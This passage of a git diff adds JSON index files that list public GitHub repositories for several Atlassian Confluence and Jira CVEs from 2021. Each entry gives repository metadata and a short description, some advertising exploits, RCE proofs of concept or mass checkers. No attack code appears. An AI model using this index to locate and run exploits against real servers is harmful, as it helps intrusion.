+ "description": "PoC of CVE-2021-26084 written in Golang based on https:\/\/twitter.com\/jas502n\/status\/1433044110277890057?s=20",
+ "fork": false,
+ "created_at": "2021-09-01T16:17:35Z",
+ "updated_at": "2024-06-05T13:33:34Z",
+ "pushed_at": "2021-09-01T16:18:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 402267593,
+ "name": "cve-2021-26084-confluence",
+ "full_name": "smallpiggy\/cve-2021-26084-confluence",
+ "owner": {
+ "login": "smallpiggy",
+ "id": 44887613,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44887613?v=4",
+ "html_url": "https:\/\/github.com\/smallpiggy"
+ },
+ "html_url": "https:\/\/github.com\/smallpiggy\/cve-2021-26084-confluence",
+ "description": "Just run command without brain",
+ "fork": false,
+ "created_at": "2021-09-02T02:41:49Z",
+ "updated_at": "2021-09-02T02:42:17Z",
+ "pushed_at": "2021-09-02T02:42:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 402323962,
+ "name": "CVE-2021-26084",
+ "full_name": "maskerTUI\/CVE-2021-26084",
+ "owner": {
+ "login": "maskerTUI",
+ "id": 3371449,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3371449?v=4",
+ "html_url": "https:\/\/github.com\/maskerTUI"
+ },
+ "html_url": "https:\/\/github.com\/maskerTUI\/CVE-2021-26084",
+ "description": "This is exploit",
+ "fork": false,
+ "created_at": "2021-09-02T07:05:23Z",
+ "updated_at": "2021-09-02T07:07:25Z",
+ "pushed_at": "2021-09-02T07:07:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 402400207,
+ "name": "CVE-2021-26084-Nuclei-template",
+ "full_name": "BeRserKerSec\/CVE-2021-26084-Nuclei-template",
+ "owner": {
+ "login": "BeRserKerSec",
+ "id": 72992256,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72992256?v=4",
+ "html_url": "https:\/\/github.com\/BeRserKerSec"
+ },
+ "html_url": "https:\/\/github.com\/BeRserKerSec\/CVE-2021-26084-Nuclei-template",
+ "description": "This nuclei template is to verify the vulnerability without executing any commands to the target machine ",
+ "fork": false,
+ "created_at": "2021-09-02T11:47:10Z",
+ "updated_at": "2021-12-09T13:36:55Z",
+ "pushed_at": "2021-09-02T11:50:06Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 402654322,
+ "name": "CVE-2021-26084",
+ "full_name": "p0nymc1\/CVE-2021-26084",
+ "owner": {
+ "login": "p0nymc1",
+ "id": 88642465,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88642465?v=4",
+ "html_url": "https:\/\/github.com\/p0nymc1"
+ },
+ "html_url": "https:\/\/github.com\/p0nymc1\/CVE-2021-26084",
+ "description": "CVE-2021-26084",
+ "fork": false,
+ "created_at": "2021-09-03T05:14:46Z",
+ "updated_at": "2022-02-09T07:33:26Z",
+ "pushed_at": "2021-09-03T08:54:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 402687741,
+ "name": "CVE-2021-26084",
+ "full_name": "Loneyers\/CVE-2021-26084",
+ "owner": {
+ "login": "Loneyers",
+ "id": 29177120,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29177120?v=4",
+ "html_url": "https:\/\/github.com\/Loneyers"
+ },
+ "html_url": "https:\/\/github.com\/Loneyers\/CVE-2021-26084",
+ "description": "CVE-2021-26084 Confluence OGNL injection",
+ "fork": false,
+ "created_at": "2021-09-03T07:41:36Z",
+ "updated_at": "2021-12-27T09:00:16Z",
+ "pushed_at": "2021-09-03T07:45:04Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 402698165,
+ "name": "cve_2021_26084",
+ "full_name": "Xc1Ym\/cve_2021_26084",
+ "owner": {
+ "login": "Xc1Ym",
+ "id": 29765332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29765332?v=4",
+ "html_url": "https:\/\/github.com\/Xc1Ym"
+ },
+ "html_url": "https:\/\/github.com\/Xc1Ym\/cve_2021_26084",
+ "description": "cve-2021-26084 EXP",
+ "fork": false,
+ "created_at": "2021-09-03T08:22:21Z",
+ "updated_at": "2021-09-03T08:22:58Z",
+ "pushed_at": "2021-09-03T08:22:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 403083297,
+ "name": "confluence-rce-poc",
+ "full_name": "wolf1892\/confluence-rce-poc",
+ "owner": {
+ "login": "wolf1892",
+ "id": 24608781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24608781?v=4",
+ "html_url": "https:\/\/github.com\/wolf1892"
+ },
+ "html_url": "https:\/\/github.com\/wolf1892\/confluence-rce-poc",
+ "description": "Setting up POC for CVE-2021-26084",
+ "fork": false,
+ "created_at": "2021-09-04T14:53:38Z",
+ "updated_at": "2021-09-04T15:16:43Z",
+ "pushed_at": "2021-09-04T15:16:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 403266565,
+ "name": "CVE-2021-26084",
+ "full_name": "smadi0x86\/CVE-2021-26084",
+ "owner": {
+ "login": "smadi0x86",
+ "id": 75253629,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75253629?v=4",
+ "html_url": "https:\/\/github.com\/smadi0x86"
+ },
+ "html_url": "https:\/\/github.com\/smadi0x86\/CVE-2021-26084",
+ "description": "Confluence server webwork OGNL injection",
+ "fork": false,
+ "created_at": "2021-09-05T09:27:55Z",
+ "updated_at": "2024-06-11T09:23:37Z",
+ "pushed_at": "2023-06-06T17:26:44Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "confluence",
+ "cve-2021-26084",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 403517544,
+ "name": "CVE-2021-26084-Confluence-OGNL",
+ "full_name": "kkin77\/CVE-2021-26084-Confluence-OGNL",
+ "owner": {
+ "login": "kkin77",
+ "id": 20243850,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20243850?v=4",
+ "html_url": "https:\/\/github.com\/kkin77"
+ },
+ "html_url": "https:\/\/github.com\/kkin77\/CVE-2021-26084-Confluence-OGNL",
+ "description": "asjhdsajdlksavksapfoka",
+ "fork": false,
+ "created_at": "2021-09-06T06:56:44Z",
+ "updated_at": "2022-09-30T06:16:15Z",
+ "pushed_at": "2021-09-06T06:56:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 403800717,
+ "name": "CVE-2021-26084",
+ "full_name": "1ZRR4H\/CVE-2021-26084",
+ "owner": {
+ "login": "1ZRR4H",
+ "id": 42696639,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42696639?v=4",
+ "html_url": "https:\/\/github.com\/1ZRR4H"
+ },
+ "html_url": "https:\/\/github.com\/1ZRR4H\/CVE-2021-26084",
+ "description": "Atlassian Confluence CVE-2021-26084 one-liner mass checker",
+ "fork": false,
+ "created_at": "2021-09-07T01:15:16Z",
+ "updated_at": "2023-09-28T11:31:12Z",
+ "pushed_at": "2021-09-07T12:59:45Z",
+ "stargazers_count": 31,
+ "watchers_count": 31,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 31,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 403962659,
+ "name": "cve-2021-26084-confluence",
+ "full_name": "GlennPegden2\/cve-2021-26084-confluence",
+ "owner": {
+ "login": "GlennPegden2",
+ "id": 34956796,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34956796?v=4",
+ "html_url": "https:\/\/github.com\/GlennPegden2"
+ },
+ "html_url": "https:\/\/github.com\/GlennPegden2\/cve-2021-26084-confluence",
+ "description": "A quick and dirty PoC of cve-2021-26084 as none of the existing ones worked for me.",
+ "fork": false,
+ "created_at": "2021-09-07T12:04:09Z",
+ "updated_at": "2023-01-10T03:23:11Z",
+ "pushed_at": "2021-09-07T15:09:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 404381633,
+ "name": "docker-confluence-patched",
+ "full_name": "toowoxx\/docker-confluence-patched",
+ "owner": {
+ "login": "toowoxx",
+ "id": 60697748,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60697748?v=4",
+ "html_url": "https:\/\/github.com\/toowoxx"
+ },
+ "html_url": "https:\/\/github.com\/toowoxx\/docker-confluence-patched",
+ "description": "Patched Confluence 7.12.2 (CVE-2021-26084)",
+ "fork": false,
+ "created_at": "2021-09-08T14:35:37Z",
+ "updated_at": "2023-12-05T14:09:31Z",
+ "pushed_at": "2021-09-17T12:45:19Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 404430174,
+ "name": "CVE-2021-26084-patch-",
+ "full_name": "nizar0x1f\/CVE-2021-26084-patch-",
+ "owner": {
+ "login": "nizar0x1f",
+ "id": 44277400,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44277400?v=4",
+ "html_url": "https:\/\/github.com\/nizar0x1f"
+ },
+ "html_url": "https:\/\/github.com\/nizar0x1f\/CVE-2021-26084-patch-",
+ "description": "CVE-2021-26084 patch as provided in \"Confluence Security Advisory - 2021-08-25\"",
+ "fork": false,
+ "created_at": "2021-09-08T17:05:16Z",
+ "updated_at": "2021-09-08T17:29:07Z",
+ "pushed_at": "2021-09-08T17:28:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 404608606,
+ "name": "CVE-2021-26084",
+ "full_name": "dorkerdevil\/CVE-2021-26084",
+ "owner": {
+ "login": "dorkerdevil",
+ "id": 15796745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4",
+ "html_url": "https:\/\/github.com\/dorkerdevil"
+ },
+ "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-26084",
+ "description": "Confluence OGNL injection",
+ "fork": false,
+ "created_at": "2021-09-09T06:19:13Z",
+ "updated_at": "2024-06-13T21:25:35Z",
+ "pushed_at": "2022-01-11T13:22:30Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 407790631,
+ "name": "CVE-2021-26084_PoC",
+ "full_name": "ludy-dev\/CVE-2021-26084_PoC",
+ "owner": {
+ "login": "ludy-dev",
+ "id": 70466565,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4",
+ "html_url": "https:\/\/github.com\/ludy-dev"
+ },
+ "html_url": "https:\/\/github.com\/ludy-dev\/CVE-2021-26084_PoC",
+ "description": "[CVE-2021-26084] Confluence pre-auth RCE test script",
+ "fork": false,
+ "created_at": "2021-09-18T07:33:24Z",
+ "updated_at": "2021-12-01T09:03:37Z",
+ "pushed_at": "2021-09-21T08:33:29Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 412676582,
+ "name": "CVE-2021-26084",
+ "full_name": "wdjcy\/CVE-2021-26084",
+ "owner": {
+ "login": "wdjcy",
+ "id": 6531850,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6531850?v=4",
+ "html_url": "https:\/\/github.com\/wdjcy"
+ },
+ "html_url": "https:\/\/github.com\/wdjcy\/CVE-2021-26084",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-02T03:11:50Z",
+ "updated_at": "2021-10-02T03:16:43Z",
+ "pushed_at": "2021-10-02T03:16:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414400971,
+ "name": "CVE-2021-26084",
+ "full_name": "orangmuda\/CVE-2021-26084",
+ "owner": {
+ "login": "orangmuda",
+ "id": 91846073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4",
+ "html_url": "https:\/\/github.com\/orangmuda"
+ },
+ "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-26084",
+ "description": "CVE-2021-26084 - Confluence Server Webwork OGNL injection ",
+ "fork": false,
+ "created_at": "2021-10-06T23:24:24Z",
+ "updated_at": "2023-09-28T11:32:07Z",
+ "pushed_at": "2022-01-27T06:16:01Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 419246152,
+ "name": "CVE-2021-26084_Confluence",
+ "full_name": "TheclaMcentire\/CVE-2021-26084_Confluence",
+ "owner": {
+ "login": "TheclaMcentire",
+ "id": 86812068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86812068?v=4",
+ "html_url": "https:\/\/github.com\/TheclaMcentire"
+ },
+ "html_url": "https:\/\/github.com\/TheclaMcentire\/CVE-2021-26084_Confluence",
+ "description": "Exploit CVE 2021 26084 Confluence",
+ "fork": false,
+ "created_at": "2021-10-20T08:27:58Z",
+ "updated_at": "2024-01-19T02:45:12Z",
+ "pushed_at": "2021-09-08T11:04:53Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 420861154,
+ "name": "CVE-2021-26084",
+ "full_name": "Jun-5heng\/CVE-2021-26084",
+ "owner": {
+ "login": "Jun-5heng",
+ "id": 88525975,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88525975?v=4",
+ "html_url": "https:\/\/github.com\/Jun-5heng"
+ },
+ "html_url": "https:\/\/github.com\/Jun-5heng\/CVE-2021-26084",
+ "description": "confluence远程代码执行RCE \/ Code By:Jun_sheng",
+ "fork": false,
+ "created_at": "2021-10-25T03:07:28Z",
+ "updated_at": "2022-01-02T13:22:29Z",
+ "pushed_at": "2022-04-18T03:37:18Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 421299784,
+ "name": "CVE-2021-26084",
+ "full_name": "lleavesl\/CVE-2021-26084",
+ "owner": {
+ "login": "lleavesl",
+ "id": 91398948,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91398948?v=4",
+ "html_url": "https:\/\/github.com\/lleavesl"
+ },
+ "html_url": "https:\/\/github.com\/lleavesl\/CVE-2021-26084",
+ "description": "CVE-2021-26084,Atlassian Confluence OGNL注入漏洞",
+ "fork": false,
+ "created_at": "2021-10-26T06:01:38Z",
+ "updated_at": "2022-09-03T22:05:44Z",
+ "pushed_at": "2021-10-27T02:30:40Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 431232449,
+ "name": "conflucheck",
+ "full_name": "quesodipesto\/conflucheck",
+ "owner": {
+ "login": "quesodipesto",
+ "id": 13822638,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13822638?v=4",
+ "html_url": "https:\/\/github.com\/quesodipesto"
+ },
+ "html_url": "https:\/\/github.com\/quesodipesto\/conflucheck",
+ "description": "Python 3 script to identify CVE-2021-26084 via network requests.",
+ "fork": false,
+ "created_at": "2021-11-23T19:45:31Z",
+ "updated_at": "2021-11-24T19:02:52Z",
+ "pushed_at": "2021-11-24T19:02:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439271937,
+ "name": "Confluence-CVE-2021-26084",
+ "full_name": "30579096\/Confluence-CVE-2021-26084",
+ "owner": {
+ "login": "30579096",
+ "id": 27181766,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27181766?v=4",
+ "html_url": "https:\/\/github.com\/30579096"
+ },
+ "html_url": "https:\/\/github.com\/30579096\/Confluence-CVE-2021-26084",
+ "description": "OGNL Injection in Confluence server version < 7.12.5",
+ "fork": false,
+ "created_at": "2021-12-17T09:04:55Z",
+ "updated_at": "2022-01-19T15:47:35Z",
+ "pushed_at": "2021-09-03T07:37:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 447489190,
+ "name": "CVE-2021-26084",
+ "full_name": "antx-code\/CVE-2021-26084",
+ "owner": {
+ "login": "antx-code",
+ "id": 7877940,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7877940?v=4",
+ "html_url": "https:\/\/github.com\/antx-code"
+ },
+ "html_url": "https:\/\/github.com\/antx-code\/CVE-2021-26084",
+ "description": "POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Pre-Auth RCE Injection Vulneralibity.",
+ "fork": false,
+ "created_at": "2022-01-13T06:29:51Z",
+ "updated_at": "2023-09-28T11:35:00Z",
+ "pushed_at": "2022-01-14T04:21:27Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 661577991,
+ "name": "CVE-2021-26084-EXP",
+ "full_name": "vpxuser\/CVE-2021-26084-EXP",
+ "owner": {
+ "login": "vpxuser",
+ "id": 109720761,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109720761?v=4",
+ "html_url": "https:\/\/github.com\/vpxuser"
+ },
+ "html_url": "https:\/\/github.com\/vpxuser\/CVE-2021-26084-EXP",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-03T07:31:29Z",
+ "updated_at": "2023-09-11T11:40:35Z",
+ "pushed_at": "2023-07-05T05:32:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-26084",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 793039722,
+ "name": "CVE-2021-26084",
+ "full_name": "nahcusira\/CVE-2021-26084",
+ "owner": {
+ "login": "nahcusira",
+ "id": 87233531,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87233531?v=4",
+ "html_url": "https:\/\/github.com\/nahcusira"
+ },
+ "html_url": "https:\/\/github.com\/nahcusira\/CVE-2021-26084",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-28T08:56:30Z",
+ "updated_at": "2024-05-06T15:13:35Z",
+ "pushed_at": "2024-05-06T15:13:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 807402056,
+ "name": "Confluence-RCE",
+ "full_name": "BBD-YZZ\/Confluence-RCE",
+ "owner": {
+ "login": "BBD-YZZ",
+ "id": 132546612,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4",
+ "html_url": "https:\/\/github.com\/BBD-YZZ"
+ },
+ "html_url": "https:\/\/github.com\/BBD-YZZ\/Confluence-RCE",
+ "description": "confluence rce (CVE-2021-26084, CVE-2022-26134, CVE-2023-22527)",
+ "fork": false,
+ "created_at": "2024-05-29T03:20:22Z",
+ "updated_at": "2024-06-17T08:15:03Z",
+ "pushed_at": "2024-05-29T06:14:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26085.json b/2021/CVE-2021-26085.json
new file mode 100644
index 0000000000..2d5b22a7da
--- /dev/null
+++ b/2021/CVE-2021-26085.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 413731751,
+ "name": "CVE-2021-26085",
+ "full_name": "ColdFusionX\/CVE-2021-26085",
+ "owner": {
+ "login": "ColdFusionX",
+ "id": 8522240,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4",
+ "html_url": "https:\/\/github.com\/ColdFusionX"
+ },
+ "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2021-26085",
+ "description": "Atlassian Confluence Server 7.5.1 Pre-Authorization Arbitrary File Read vulnerability (CVE-2021-26085)",
+ "fork": false,
+ "created_at": "2021-10-05T08:20:25Z",
+ "updated_at": "2023-09-28T11:32:02Z",
+ "pushed_at": "2021-10-12T05:08:47Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "confluence",
+ "cve-2021-26085",
+ "file-read-vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26086.json b/2021/CVE-2021-26086.json
new file mode 100644
index 0000000000..a7f273e94a
--- /dev/null
+++ b/2021/CVE-2021-26086.json
@@ -0,0 +1,66 @@
+[
+ {
+ "id": 403189408,
+ "name": "CVE-2021-26086",
+ "full_name": "Jeromeyoung\/CVE-2021-26086",
+ "owner": {
+ "login": "Jeromeyoung",
+ "id": 39945364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4",
+ "html_url": "https:\/\/github.com\/Jeromeyoung"
+ },
+ "html_url": "https:\/\/github.com\/Jeromeyoung\/CVE-2021-26086",
+ "description": "Confluence OGNL Injection [CVE-2021-26084].",
+ "fork": false,
+ "created_at": "2021-09-05T01:28:23Z",
+ "updated_at": "2023-07-28T03:28:19Z",
+ "pushed_at": "2021-09-04T13:57:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 413844972,
+ "name": "CVE-2021-26086",
+ "full_name": "ColdFusionX\/CVE-2021-26086",
+ "owner": {
+ "login": "ColdFusionX",
+ "id": 8522240,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4",
+ "html_url": "https:\/\/github.com\/ColdFusionX"
+ },
+ "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2021-26086",
+ "description": "Atlassian Jira Server\/Data Center 8.4.0 - Arbitrary File read (CVE-2021-26086)",
+ "fork": false,
+ "created_at": "2021-10-05T14:09:52Z",
+ "updated_at": "2023-10-13T15:37:06Z",
+ "pushed_at": "2021-10-12T05:16:48Z",
+ "stargazers_count": 24,
+ "watchers_count": 24,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-26086",
+ "file-read-vulnerability",
+ "jira"
+ ],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 24,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26088.json b/2021/CVE-2021-26088.json
new file mode 100644
index 0000000000..587a986308
--- /dev/null
+++ b/2021/CVE-2021-26088.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 638485881,
+ "name": "CVE-2021-26088",
+ "full_name": "theogobinet\/CVE-2021-26088",
+ "owner": {
+ "login": "theogobinet",
+ "id": 30470719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30470719?v=4",
+ "html_url": "https:\/\/github.com\/theogobinet"
+ },
+ "html_url": "https:\/\/github.com\/theogobinet\/CVE-2021-26088",
+ "description": "PoC for CVE-2021-26088 written in PowerShell",
+ "fork": false,
+ "created_at": "2023-05-09T13:13:41Z",
+ "updated_at": "2023-06-04T18:20:35Z",
+ "pushed_at": "2023-05-09T13:18:45Z",
